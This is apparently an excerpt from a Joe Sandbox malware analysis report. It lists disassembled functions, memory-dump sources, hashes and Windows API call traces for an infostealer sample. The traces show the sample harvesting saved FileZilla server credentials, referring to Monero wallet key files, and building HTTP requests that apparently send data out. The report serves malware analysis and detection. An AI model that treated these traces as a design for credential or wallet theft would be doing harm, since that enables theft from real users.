                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $R|
                              • API String ID: 0-669679497
                              • Opcode ID: ad7201a3f198f967071ba9123c5da168f4eee774d28b6acae2308488e2dc2a11
                              • Instruction ID: c323bba091a9194d37e4ef3f99a962a25f88a4799c13deb3b326eaf902cf02bf
                              • Opcode Fuzzy Hash: ad7201a3f198f967071ba9123c5da168f4eee774d28b6acae2308488e2dc2a11
                              • Instruction Fuzzy Hash: A731D0F3E065101BF3485878DD657B6A68AD7D4331F3B863EEA4AD7788EC798C460290
                              Function 00ED59B1 Relevance: .2, Instructions: 211COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a17bd4057304aa4459635d8e19b0c7f44ca2c2436d20b54d9c1938fc7d4bac1e
                              • Instruction ID: 20214e9299baad7ee7c62f0d9ab0af416079d3923b5b5ca052ab7717c7e02118
                              • Opcode Fuzzy Hash: a17bd4057304aa4459635d8e19b0c7f44ca2c2436d20b54d9c1938fc7d4bac1e
                              • Instruction Fuzzy Hash: 3C5138F3A082045FF3086A1CDC8177AB7DAEB94320F1B453DEB8993780E979680586D6
                              Function 00FF4FB2 Relevance: .2, Instructions: 160COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b795271b50fbf5cfe323e8175681846d50d0420455e5b59fffc34605996afe9f
                              • Instruction ID: 29f5c550cdc0a2b2a11362c2f651d57dd748037b3ad51b276f7f7295bf5a9418
                              • Opcode Fuzzy Hash: b795271b50fbf5cfe323e8175681846d50d0420455e5b59fffc34605996afe9f
                              • Instruction Fuzzy Hash: CB4156F3B592145BF3146939ED497BBBB8BD7D0371F2AC23EE68483A88EC3519064185
                              Function 00FA58F3 Relevance: .2, Instructions: 157COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d4ad9f2a4330267b871b0f8fdb65c05cdd0b482041c3792f97cd70087a64130
                              • Instruction ID: 50b32d830afc060c23dd579099b637644dcd82d86be50492fc6fe36f6749cbfe
                              • Opcode Fuzzy Hash: 8d4ad9f2a4330267b871b0f8fdb65c05cdd0b482041c3792f97cd70087a64130
                              • Instruction Fuzzy Hash: 5A4136F3B082149FE3546969DC857AAB7DAEB84720F17453DDB88C3380E979980187CA
                              Function 010AA775 Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cc5cbd7964c6e393bfac170251d069adaf7cc4011591f73e0c52d347eac81700
                              • Instruction ID: 16a36bd1e23ca608acf9aa884aef9d471def6fc7885a5d725d726634aee449e5
                              • Opcode Fuzzy Hash: cc5cbd7964c6e393bfac170251d069adaf7cc4011591f73e0c52d347eac81700
                              • Instruction Fuzzy Hash: BD4156B240C714EFD315AF2AD8816AAFBE4FF94B20F16892DE6D483250D7355880DB97
                              Function 00C69750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00C60250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00C70DBA,00C70DB7,00C70DB6,00C70DB3), ref: 00C60362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C60369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C60385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C603CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C603DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00C60419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C60463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C6051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C6054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C60562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00C60571
                              • lstrcat.KERNEL32(?,url: ), ref: 00C60580
                              • lstrcat.KERNEL32(?,00000000), ref: 00C60593
                              • lstrcat.KERNEL32(?,00C71678), ref: 00C605A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00C605B5
                              • lstrcat.KERNEL32(?,00C7167C), ref: 00C605C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00C605D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00C605E6
                              • lstrcat.KERNEL32(?,00C71688), ref: 00C605F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00C60604
                              • lstrcat.KERNEL32(?,00000000), ref: 00C60617
                              • lstrcat.KERNEL32(?,00C71698), ref: 00C60626
                              • lstrcat.KERNEL32(?,00C7169C), ref: 00C60635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C6068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 8e57a89e2dc57bf624d522e5d016bf96e14456f70d96c8b3aefd9a7564846d7e
                              • Instruction ID: ab6e51d7467ed2440b429f1dbe9b58ddaf709f89941dc37be53fca9d9973dfba
                              • Opcode Fuzzy Hash: 8e57a89e2dc57bf624d522e5d016bf96e14456f70d96c8b3aefd9a7564846d7e
                              • Instruction Fuzzy Hash: DDD10E719102089BCB24EBE4DDD6EEE7378EF58300F548529F506B7091DE74AA0ADFA1
                              Function 00C55960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C559F8
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C55A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C55B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007FE838,00000000,?,007FA330,00000000,?,00C71A1C), ref: 00C55E71
                              • lstrlen.KERNEL32(00000000), ref: 00C55E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00C55E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C55E9A
                              • lstrlen.KERNEL32(00000000), ref: 00C55EAF
                              • lstrlen.KERNEL32(00000000), ref: 00C55ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C55EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00C55F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C55F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C55F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00C55FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00C55FBD
                              • HttpOpenRequestA.WININET(00000000,007FE828,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C55BF8
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00C55FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 3e3036e73539e3e3d836653f10888ac77b8ebe38444bcf490a861e768ea1f726
                              • Instruction ID: e7408e3ec2488fcd75b027821be56c8e958c61862e452663ffbc73a205ca2859
                              • Opcode Fuzzy Hash: 3e3036e73539e3e3d836653f10888ac77b8ebe38444bcf490a861e768ea1f726
                              • Instruction Fuzzy Hash: D612DE71820118AADB25EBA0DCD6FEEB378BF18700F5441A9F50673091EF706A49DF65
                              Function 00C5CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C5D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C5D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D208
                              • lstrcat.KERNEL32(?,00C71478), ref: 00C5D217
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D22A
                              • lstrcat.KERNEL32(?,00C7147C), ref: 00C5D239
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D24C
                              • lstrcat.KERNEL32(?,00C71480), ref: 00C5D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D26E
                              • lstrcat.KERNEL32(?,00C71484), ref: 00C5D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D290
                              • lstrcat.KERNEL32(?,00C71488), ref: 00C5D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D2B2
                              • lstrcat.KERNEL32(?,00C7148C), ref: 00C5D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D2D4
                              • lstrcat.KERNEL32(?,00C71490), ref: 00C5D2E3
                                • Part of subcall function 00C6A820: lstrlen.KERNEL32(00C54F05,?,?,00C54F05,00C70DDE), ref: 00C6A82B
                                • Part of subcall function 00C6A820: lstrcpy.KERNEL32(00C70DDE,00000000), ref: 00C6A885
                              • lstrlen.KERNEL32(?), ref: 00C5D32A
                              • lstrlen.KERNEL32(?), ref: 00C5D339
                                • Part of subcall function 00C6AA70: StrCmpCA.SHLWAPI(007F9198,00C5A7A7,?,00C5A7A7,007F9198), ref: 00C6AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
